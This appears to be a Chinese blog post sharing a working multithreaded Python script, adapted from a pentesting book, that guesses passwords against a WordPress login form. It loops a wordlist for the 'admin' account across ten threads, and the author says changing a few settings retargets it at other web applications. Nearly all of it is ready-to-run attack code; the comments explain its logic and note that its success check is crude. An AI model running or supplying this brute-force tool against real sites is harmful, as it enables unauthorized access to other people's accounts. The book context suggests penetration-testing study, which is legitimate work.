python多线程破解form登录(wordpress)

本文代码参考自《Black Hat Python: Python Programming for Hackers and Pentesters》
原书使用urllib,urllib2,HTMLParser等库实现,这里我用requests请求,pyquery来解析,更加方便一点。
只要修改脚本开头的几个全局参数,就可以用于其他的web程序。原书中的代码用于破解joomla,这里改成了wordpress。
书里的代码可以去python代码仓库查看,这里用到的dir_bruster那个函数也在里面,我会不断更新这个仓库,push一些学到的python代码,欢迎交流。

#!/usr/bin/python
#coding=utf-8

import requests
import Queue
import threading
import sys
from pyquery import PyQuery as pq
from dir_bruster import build_wordlist

# Number of worker threads that Bruster.run_brust starts.
thread_count = 10

# Account name submitted with every attempt, and the candidate passwords.
# build_wordlist comes from the author's dir_bruster module (not shown here);
# the class below calls empty(), get() and qsize() on its result, so it is
# presumably a Queue filled from the file -- confirm against dir_bruster.
username = 'admin'
wordlist = build_wordlist('./pwd.txt')

# URL that serves the login form. It is fetched before every attempt so that
# the form's existing <input> values can be copied into the POST body.
# 192.168.99.196 is an RFC 1918 private address.
target_url = 'http://192.168.99.196/wordpress/wp-login.php'
# URL the form is submitted to (the form's action); the same page here.
target_post = 'http://192.168.99.196/wordpress/wp-login.php'

# Names of the form inputs that carry the user name and the password.
username_field = 'log'
password_field = 'pwd'

class Bruster(object):
    '''
    Multi-threaded password guessing against a web login form.

    The target is described by the module-level settings (target_url,
    target_post, username_field, password_field, thread_count); this example
    is set up for a WordPress login page. Pages are fetched with requests
    and the form is read with pyquery.

    What a server sees per guess, as written: a fresh session, one GET of
    the login page, then one POST of the form, from thread_count workers
    with no delay between attempts. Per-account attempt limits or rate
    limiting on the login URL are the controls this pattern runs into.

    NOTE(review): the page this listing came from lost its indentation, so
    the nesting below is reconstructed from the statements themselves.
    '''

    def __init__(self, username, wordlist):
        '''
        Store the account name and the candidate-password queue.

        wordlist must offer empty(), get() and qsize(), which is how the
        workers use it.
        '''
        self.wordlist = wordlist
        self.username = username
        # Set by whichever worker first sees a response without the failure
        # text; every worker checks it before taking the next candidate.
        self.found = False

    def run_brust(self):
        '''Start thread_count threads that each run brust_form.'''
        for _ in range(thread_count):
            worker = threading.Thread(target=self.brust_form)
            worker.start()

    def brust_form(self):
        '''
        Worker loop: take candidates from the queue until it is empty or
        another worker has set self.found.
        '''
        while True:
            if self.wordlist.empty() or self.found:
                break
            candidate = self.wordlist.get()
            try:
                # New session per attempt, so cookies set by the GET are
                # sent back with the POST.
                session = requests.Session()
                login_page = session.get(target_url)
                form = self.parse(login_page.text)
                form[username_field] = self.username
                form[password_field] = candidate

                remaining = self.wordlist.qsize()
                print('Trying %s:%s (%d left)' % (self.username, candidate, remaining))
                reply = session.post(target_post, data=form)
                # The only test is the absence of this one failure message
                # (the wrong-password text of a Chinese-language install,
                # by the look of it). Any other response -- a different
                # error, a lockout or challenge page -- is therefore also
                # reported as a success.
                if '密码不正确' in reply.content:
                    continue
                self.found = True
                print('Brute successful by %s:%s' % (self.username, candidate))
            except requests.ConnectionError as e:
                # Only connection failures are handled; the candidate is
                # not retried, and any other exception ends this worker.
                print(e)

    def parse(self, page):
        '''
        Build the POST body from the login page.

        Returns a dict with one entry per named <input> element, holding
        the element's current value, or '' when it has none.
        '''
        document = pq(page)
        body = {}
        for field in document.find('input'):
            if field.name is None:
                continue
            body[field.name] = field.value if field.value is not None else ''
        return body

# Script entry: build the worker pool from the module-level settings and
# start it. run_brust returns as soon as the threads are started; the
# workers keep the process alive until they finish.
b = Bruster(username=username, wordlist=wordlist)
b.run_brust()